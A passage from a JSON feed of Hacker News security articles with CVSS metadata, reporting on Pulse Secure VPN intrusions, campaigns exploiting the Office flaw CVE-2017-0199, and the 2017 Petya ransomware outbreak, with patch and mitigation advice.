UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * UNC2717 - HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nFireEye's continued investigation into the attacks as part of its incident response efforts has uncovered four more malware families deployed by UNC2630 \u2014 BLOODMINE, BLOODBANK, CLEANPULSE, and RAPIDPULSE \u2014 for purposes of harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence.\n\n[](<https://thehackernews.com/images/-NSSEZWK9pjk/YLCaJqPCIUI/AAAAAAAACqU/AnObAGs5rNM92xF_myGkjOHr3neFaXDgQCLcBGAsYHQ/s0/data.jpg>)\n\nIn addition, the threat actors were also observed removing web shells, ATRIUM, and SLIGHTPULSE, from dozens of compromised VPN devices between April 17 and April 20 in what the researchers describe as \"unusual,\" suggesting \"this action displays an interesting concern for operational security and a sensitivity to publicity.\"\n\nAt the heart of these intrusions lies [CVE-2021-22893](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>), a recently patched vulnerability in Pulse Secure VPN devices that the adversaries exploited to gain an initial foothold on the target network, using it to steal credentials, escalate privileges, conduct internal reconnaissance by moving laterally across the network, before maintaining long-term persistent access, and accessing sensitive data.\n\n\"Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration,\" the researchers said. \"They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. 
This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-28T07:29:00", "type": "thn", "title": "Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-29T08:17:43", "id": "THN:603F844B99A1CC0CF1DE580659626B57", "href": "https://thehackernews.com/2021/05/chinese-cyber-espionage-hackers.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:16", "description": 
"[](<https://thehackernews.com/images/-IPYvggwn6XM/YJD7KaAKMwI/AAAAAAAACck/8bYszyL6u9IfDFcNzx4jcnFXKFQMRJ5NQCLcBGAsYHQ/s0/pulse-vpn.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors.\n\nTracked as [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) (CVSS score 10), the flaw concerns \"multiple use after free\" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted.\n\nThe flaw came to light on April 20 after FireEye [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks.\n\nThe development promoted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an [Emergency Directive](<https://www.cisa.gov/news/2021/04/20/cisa-issues-emergency-directive-requiring-federal-agencies-check-pulse-connect>) urging federal agencies and civilian departments to mitigate any anomalous activity or active exploitation detected on their networks.\n\n[](<https://thehackernews.com/images/-MkjnmX9bSrs/YJD7dbZ3IQI/AAAAAAAACcs/Bz7ex--si1ots__08HdxtIU7xkoM1_fOACLcBGAsYHQ/s0/vpn-hacking.jpg>)\n\nFollowing an investigation conducted in conjunction with FireEye Mandiant, Ivanti said the attacks were observed on a \"very limited number\" of customer systems. 
FireEye is tracking the activity under two separate clusters, UNC2630 and UNC2717, citing differences in the malicious web shells that were dropped on the compromised devices.\n\n\"As sophisticated threat actors continue their attacks on U.S. businesses and government agencies, we will continue to work with our customers, the broader security industry, law enforcement and government agencies to mitigate these threats,\" the Utah-based software firm [said](<https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/>).\n\n\"Companywide we are making significant investments to enhance our overall cybersecurity posture, including a more broad implementation of secure application development standards.\"\n\nPulse Secure customers are advised to move quickly to apply the update to ensure they are protected. The company has also released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to check for signs of compromise and identify malicious activity on their systems.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-04T07:52:00", "type": "thn", "title": "Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-04T08:21:24", "id": "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "href": "https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T09:18:15", "description": "Recently we reported about a critical [code execution vulnerability in Microsoft Word](<https://thehackernews.com/2017/04/microsoft-word-zero-day.html>) that was being exploited in the wild by cyber criminal groups to 
distribute malware like [Dridex banking trojans](<https://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html>) and Latentbot. \n \nNow, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also actively being exploited by government-sponsored hackers to spy on Russian targets since at least this January. \n \nThe news comes after security firm FireEye, which independently discovered this flaw last month, published a [blog post](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>) revealing that **FinSpy** spyware was installed as early as January using the same vulnerability in Word that was [patched on Tuesday](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>) by Microsoft. \n \nFor those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up-to-date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML app from a server, disguised as a document created in Microsoft's RTF (Rich Text Format). \n \n[FinSpy or FinFisher](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>) is associated with the controversial UK-based firm Gamma Group, which sells so-called \"lawful intercept\" spyware to governments around the world. \n\n\n> \"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it,\" FireEye researchers said. 
\n\n> \"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective\u2014a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\"\n\nMonths later, in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals. \n \nLatentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software. \n\n\n> FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like \"hire_form.doc\", \"!!!!URGENT!!!!READ!!!.doc\", \"PDP.doc\", and \"document.doc\".\n\nHowever, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called **Terdot**, which then installed software that uses the TOR anonymity service to hide the identity of the servers it contacted. \n \nAccording to FireEye researchers, the MS Word exploit used to install Finspy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers were obtained from the same source. \n \nThis finding highlights that whoever initially discovered this zero-day vulnerability sold it to many actors, including commercial companies that deal in buying and selling zero-day exploits as well as financially motivated online criminals. \n \nJust Monday evening, Proofpoint researchers also discovered [a massive campaign of spam email](<https://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html>) targeting millions of users across financial institutions in Australia with the Dridex banking malware, again by exploiting the same vulnerability in Word. 
\n \nFireEye researchers are still not sure of the source of the exploit that delivered the [Dridex banking trojan](<https://thehackernews.com/2016/02/botnet-antivirus.html>), but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them. \n \nMicrosoft patched the MS Word vulnerability on Tuesday, which hackers, as well as government spies, had been exploiting for months. So, users are strongly advised to install updates as soon as possible to protect themselves against the ongoing attacks.\n", "cvss3": {}, "published": "2017-04-12T21:41:00", "type": "thn", "title": "Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-13T08:41:46", "id": "THN:CB1C2DA47986D8345154BCABBFE41314", "href": "https://thehackernews.com/2017/04/microsoft-word-zeroday.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:08", "description": "Watch out, readers! It is ransomware, another WannaCry, another widespread attack. \n \nThe [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) is not dead yet and another large-scale ransomware attack is making chaos worldwide, shutting down computers at corporates, power supplies, and banks across Russia, Ukraine, Spain, France, UK, India, and Europe and demanding $300 in bitcoins. 
\n \nAccording to multiple sources, a new variant of [Petya ransomware](<https://thehackernews.com/2016/04/ransomware-decrypt-tool.html>), also known as Petwrap, is spreading rapidly with the help of the same [Windows SMBv1 vulnerability](<https://thehackernews.com/2017/06/windows-10-redstone3-smb.html>) that the WannaCry ransomware abused to infect 300,000 systems and servers worldwide in just 72 hours last month. \n \nApart from this, many victims have also reported that Petya ransomware has infected their patched systems. \n \n\n\n> \"Petya uses the NSA Eternalblue exploit but also spreads in internal networks with WMIC and PSEXEC. That's why patched systems can get hit.\" Mikko Hypponen, Chief Research Officer at F-Secure, [confirms](<https://twitter.com/mikko/status/879742221326721028>).\n\n \n[Petya](<https://thehackernews.com/2016/04/ransomware-decrypt-tool.html>) is a nasty piece of ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one. \n \nInstead, Petya reboots victims' computers and encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk. \n \nPetya ransomware replaces the computer's MBR with its own malicious code that displays the ransom note and leaves computers unable to boot. \n \n\n\n### Don't Pay Ransom, You Wouldn\u2019t Get Your Files Back \n\nInfected users are advised not to pay the ransom because the hackers behind Petya ransomware can\u2019t get your emails anymore. \n \nPosteo, the German email provider, has [suspended](<https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt>) the email address 
wowsmith123456@posteo.net, which was being used by the criminals to communicate with victims after receiving the ransom in order to send the decryption keys. \n \nAt the time of writing, 23 victims have [paid](<https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX>) in Bitcoin to the '_1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX_' address for decrypting their files infected by Petya, which totals roughly $6775. \n\n\n### Petya! Petya! Another Worldwide Ransomware Attack\n\nScreenshots of the latest Petya infection, shared on Twitter, show that the ransomware displays a text demanding $300 worth of Bitcoins. Here's what the text reads: \n\n\n> \"_If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don't waste your time. Nobody can recover your files without our decryption service_.\"\n\nAccording to a recent [VirusTotal scan](<https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/>), currently only 16 out of 61 anti-virus services are successfully detecting the Petya ransomware malware. \n \n\n\n### Petya Ransomware Hits Banks, Telecom, Businesses & Power Companies\n\nSupermarket in Kharkiv, East Ukraine \n\nPetya ransomware has already infected Russian state-owned oil giant Rosneft and the Ukrainian state electricity suppliers \"Kyivenergo\" and \"Ukrenergo\" in the past few hours. \n\n\n> \"_We were attacked. Two hours ago, we had to turn off all our computers. 
We are waiting for permission from Ukraine's Security Service (SBU) to switch them back on,_\" Kyivenergo's press service said.\n\nThere are reports from several banks, including the National Bank of Ukraine (NBU) and Oschadbank, as well as other companies, confirming they have been hit by the Petya ransomware attacks. \n \nMaersk, an international logistics company, has also confirmed on [Twitter](<https://twitter.com/Maersk/status/879679584282738688>) that the latest Petya ransomware attacks have shut down its IT systems at multiple locations and business units. \n\n\n> \"We can confirm that Maersk IT systems are down across multiple sites and business units. We are currently asserting the situation. The safety of our employees, our operations and customers' business is our top priority. We will update when we have more information,\" the company said.\n\nThe ransomware also impacts multiple workstations at the Ukrainian branch of mining company Evraz. \n \nThe most severe damage reported by Ukrainian businesses also includes compromised systems at Ukraine's [local metro](<https://twitter.com/kyivmetroalerts/status/879670749149245440>) and [Kiev's Boryspil Airport](<https://www.facebook.com/eugenedihne/?hc_ref=PAGES_TIMELINE&fref=nf>). \n \nThree Ukrainian telecommunication operators, Kyivstar, LifeCell and Ukrtelecom, are also affected in the latest Petya attack. \n \n\n\n### How Is Petya Ransomware Spreading So Fast?\n\nSymantec, the cyber security company, has also confirmed that Petya ransomware is exploiting the SMBv1 [EternalBlue exploit](<https://thehackernews.com/2017/04/window-zero-day-patch.html>), just like WannaCry, and taking advantage of unpatched Windows machines. 
\n \n\"_Petya ransomware successful in spreading because it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010),_\" a security researcher using the Twitter handle HackerFantastic [tweeted](<https://twitter.com/hackerfantastic/status/879719012929875968>). \n \n**EternalBlue** is a Windows SMB exploit leaked by the infamous hacking group [Shadow Brokers](<https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html>) in its April data dump, which claimed to have stolen it from the US intelligence agency NSA, along with other Windows exploits. \n \nMicrosoft has since [patched the vulnerability](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) for all versions of Windows operating systems, but many users remain vulnerable, and a string of malware variants are exploiting the flaw to deliver ransomware and [mine cryptocurrency](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>). \n \nJust three days ago, we reported about the latest WannaCry attack that [hit Honda Motor Company and around 55 speed](<https://thehackernews.com/2017/06/honda-wannacry-attack.html>) and traffic light cameras in Japan and Australia, respectively. \n \nWell, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big corporates and companies have not yet implemented proper security measures to defend against such threats. \n \n\n\n### How to Protect Yourself from Ransomware Attacks\n\n**What to do immediately? 
**Go and apply those [goddamn patches](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) against EternalBlue (MS17-010) and disable the unsecured, 30-year-old [SMBv1 file-sharing protocol](<https://thehackernews.com/2017/06/windows-10-redstone3-smb.html>) on your Windows systems and servers. \n \nSince Petya Ransomware is also taking advantage of WMIC and PSEXEC tools to infect fully-patched Windows computers, you are also advised to [disable WMIC](<https://msdn.microsoft.com/en-us/library/aa826517\\(v=vs.85\\).aspx>) (Windows Management Instrumentation Command-line). \n \n\n\n#### Prevent Infection & Petya Kill-Switch\n\nA researcher [finds](<https://twitter.com/hackerfantastic/status/879773992726532096>) that Petya ransomware encrypts systems after rebooting the computer. So if your system is infected with Petya ransomware and it tries to restart, just do not power it back on. \n\n\n> \"_If machine reboots and you see this message, power off immediately! This is the encryption process. If you do not power on, files are fine._\" HackerFantastic [tweeted](<https://twitter.com/hackerfantastic/status/879775570766245888?s=07>). \"_Use a LiveCD or external machine to recover files_\"\n\n[PT Security](<https://twitter.com/PTsecurity_UK/status/879779707075665922>), a UK-based cyber security company, and [Amit Serper](<https://twitter.com/0xAmit/status/879778335286452224>) from Cybereason have discovered a Kill-Switch for Petya ransomware. According to a tweet, the company has advised users to create a file, \"**_C:\\Windows\\perfc_**\", to prevent ransomware infection. \n \nTo safeguard against any ransomware infection, you should always be suspicious of unwanted files and documents sent over email and should never click on links inside them without verifying the source. 
\n \nTo always have a tight grip on your valuable data, keep a good back-up routine in place that copies your files to an external storage device that isn't always connected to your PC. \n \nMoreover, make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Most importantly, always browse the Internet safely.\n", "cvss3": {}, "published": "2017-06-27T03:32:00", "type": "thn", "title": "Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-06-27T19:56:23", "id": "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "href": "https://thehackernews.com/2017/06/petya-ransomware-attack.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:15", "description": "A prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa.\n\nAmnesty International tied the covert attack campaign to a collective tracked as \"[Donot Team](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt-c-35>)\" (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence linking the group's infrastructure to an Indian company called Innefu Labs. 
The unnamed activist is believed to have been targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-loaded emails.\n\n\"The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application,\" Amnesty International [said](<https://www.amnesty.org/en/latest/news/2021/10/togo-activist-targeted-with-spyware-by-notorious-hacker-group/>) in a report published last week. \"The application was in fact a piece of custom Android spyware designed to extract some of the most sensitive and personal information stored on the activist's phone.\"\n\nThe messages originated from a WhatsApp account associated with an Indian phone number that's registered in the state of Jammu and Kashmir. Once installed, the malicious software \u2014 which takes the form of an app named \"ChatLite\" \u2014 grants the adversary permissions to access the camera and microphone, gather photos and files stored on the device, and even grab WhatsApp messages as they are being sent and received. 
\n\nBut when the aforementioned attempt failed, the attackers switched to an alternate infection chain in which an email sent from a Gmail account contained a malware-laced Microsoft Word document that leveraged a now-patched remote code execution vulnerability ([CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)) to drop a full-fledged Windows spying tool known as the YTY framework that grants complete access to the victim's machine.\n\n\"The spyware can be used to steal files from the infected computer and any connected USB drives, record keystrokes, take regular screenshots of the computer, and download additional spyware components,\" the researchers said.\n\nAlthough Innefu Labs has not been directly implicated in the incident, Amnesty International said it discovered a domain (\"server.authshieldserver.com\") that pointed to an IP address (122.160.158[.]3) used by the Delhi-based cybersecurity company. In a statement shared with the non-governmental organization, Innefu Labs denied any connection to the Donot Team APT, adding \"they are not aware of any use of their IP address for the alleged activities.\"\n\nWe have reached out to the company for further comment, and we will update the story if we hear back.\n\n\"The worrying trend of private companies actively performing unlawful digital surveillance increases the scope for abuse while reducing avenues for domestic legal redress, regulation, and judicial control,\" Amnesty said. 
\"The nature of cross-border commercial cyber surveillance where the surveillance targets, the operators, the end customer, and the attack infrastructure can all be located in different jurisdictions creates significant impediments to achieving remediation and redress for human rights abuses.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-11T09:21:00", "type": "thn", "title": "Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-10-11T17:00:22", "id": "THN:52153F8855D24E20FDD2CC03040B1EF1", "href": "https://thehackernews.com/2021/10/indian-made-mobile-spyware-targeted.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:41", "description": 
"Security researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries. \n \nThe campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky. \n \nDubbed by researchers **CopyKittens (aka Rocket Kittens)**, the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany. \n \nThe targeted organisations include government institutions like the Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations. \n \nThe latest report [[PDF](<http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf>)], dubbed \"**Operation Wilted Tulip**,\" details an active espionage campaign conducted by the CopyKittens hackers, the vast range of tools and tactics they used, their command and control infrastructure, and the group's modus operandi. \n \n\n\n### How CopyKittens Infects Its Targets\n\nThe group used different tactics to infiltrate their targets, including watering hole attacks \u2014 wherein JavaScript code is inserted into compromised websites to distribute malicious exploits. \n \nThe news media and organisations whose websites were abused for watering hole attacks include The Jerusalem Post, for which even the German Federal Office for Information Security (BSI) issued an alert, Maariv news and the IDF Disabled Veterans Organization. 
\n \nBesides watering hole attacks, CopyKittens also used other methods to deliver malware, including: \n \n\n\n * Emailed links to malicious websites controlled by attackers.\n * Weaponized Office documents exploiting a recently discovered flaw ([CVE-2017-0199](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>)).\n * Web server exploitation using vulnerability scanners and SQLi tools like Havij, sqlmap, and Acunetix.\n * Fake social media entities to build trust with targets and potentially spread malicious links.\n \n\n\n> \"The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection \u2013 before pivoting to higher value targets on the network,\" Trend Micro writes in a [blog post](<http://blog.trendmicro.com/copykittens-exposed-clearsky-trend-micro/>).\n\nIn order to infect its targets, CopyKittens makes use of its own custom malware tools in combination with existing, commercial tools, like the Red Team software Cobalt Strike, Metasploit, the post-exploitation agent Empire, the TDTESS backdoor, and the credential dumping tool Mimikatz. \n \nDubbed **Matryoshka**, the remote access trojan is the group's self-developed malware, which uses DNS for command and control (C&C) communication and has the ability to steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access. \n\n\n> \"Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open,\" ClearSky says in a [blog post](<http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/>).\n\nThe initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017, though the group also developed and used Matryoshka version 2. 
\n \nUsers are recommended to enable two-factor authentication in order to protect their webmail accounts from being compromised; a webmail account is a treasure trove of information for hackers and an \"extremely strong initial beachhead\" for pivoting into other targets.\n", "cvss3": {}, "published": "2017-07-25T04:11:00", "type": "thn", "title": "Experts Unveil Cyber Espionage Attacks by CopyKittens Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-07-25T15:18:34", "id": "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "href": "https://thehackernews.com/2017/07/opykittens-cyber-espionage.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:57", "description": "A few months back we reported how opening a simple MS Word file could compromise your computer using a critical [vulnerability in Microsoft Office](<https://thehackernews.com/2017/04/microsoft-word-zero-day.html>). \n \nThe Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface, for which a [patch was issued](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>) in April this year, but threat actors are still abusing the flaw through different mediums. \n \nSecurity researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file. 
\n \nAccording to the researchers at Trend Micro, who [spotted](<http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/>) the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider, and mainly targets companies involved in the electronics manufacturing industry. \n \nResearchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department. \n\n\n### Here's How the Attack Works:\n\nThe complete attack scenario is listed below: \n\n\n**Step 1:** The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request. \n \n**Step 2:** Once executed, the PPSX file calls an XML file programmed in it to download a \"logo.doc\" file from a remote location and runs it via the PowerPoint Show animations feature. \n \n**Step 3:** The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system. \n \n**Step 4:** RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which, when installed, allows attackers to control infected computers remotely from its command-and-control server. \n\n\nRemcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world, with capabilities such as download-and-execute commands, a keylogger, a screen logger, and recorders for both webcam and microphone. 
\n \nSince the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focus on RTF. So, the use of PPSX files allows attackers to evade antivirus detection as well. \n \nThe easiest way to protect yourself against this attack is to download and apply the patches released by Microsoft in April that address the CVE-2017-0199 vulnerability.\n", "cvss3": {}, "published": "2017-08-14T07:44:00", "type": "thn", "title": "How Just Opening A Malicious PowerPoint File Could Compromise Your PC", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-08-14T18:45:15", "id": "THN:F91523FE89728E4535456872C0532560", "href": "https://thehackernews.com/2017/08/powerpoint-malware-ms-office.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-10-01T06:04:28", "description": "A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.\n\n\"The payload discovered is a leaked version of a Cobalt Strike beacon,\" Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer [said](<https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html>) in a new analysis published Wednesday.\n\n\"The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic.\"\n\nThe malicious activity, discovered in August 2022, attempts to exploit the vulnerability 
